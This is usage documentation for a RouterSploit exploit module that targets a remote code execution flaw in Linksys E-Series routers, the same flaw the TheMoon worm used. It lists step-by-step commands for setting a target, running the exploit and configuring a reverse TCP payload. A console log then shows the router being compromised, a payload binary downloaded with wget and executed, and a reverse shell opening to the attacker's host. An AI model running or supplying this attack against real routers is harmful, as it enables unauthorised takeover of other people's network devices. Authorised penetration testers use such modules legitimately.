Description
This module exploits a remote code execution vulnerability in multiple Linksys E-Series devices. The vulnerability was actively used by the TheMoon worm.
Verification Steps
1. Start `./rsf.py`
2. Do `use exploits/routers/linksys/eseries_themoon_rce`
3. Do `set target [TargetIP]`
4. Do `run`
5. If the router is vulnerable, it should be possible to execute commands at the operating system level.
6. Do `set payload reverse_tcp`
7. Do `set lhost [AttackerIP]`
8. Do `run`
9. The payload is sent to the device and executed, providing the attacker with a command shell.
Scenarios
```
rsf > use exploits/routers/linksys/eseries_themoon_rce
rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Linksys E-Series TheMoon RCE) > run
[*] Running module...
[+] Target appears to be vulnerable
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > show payloads
[*] Available payloads:

   Payload         Name                   Description
   -------         ----                   -----------
   bind_tcp        MIPSBE Bind TCP        Creates interactive tcp bind shell for MIPSBE architecture.
   reverse_tcp     MIPSBE Reverse TCP     Creates interactive tcp reverse shell for MIPSBE architecture.

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options

Payload Options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port

cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell
```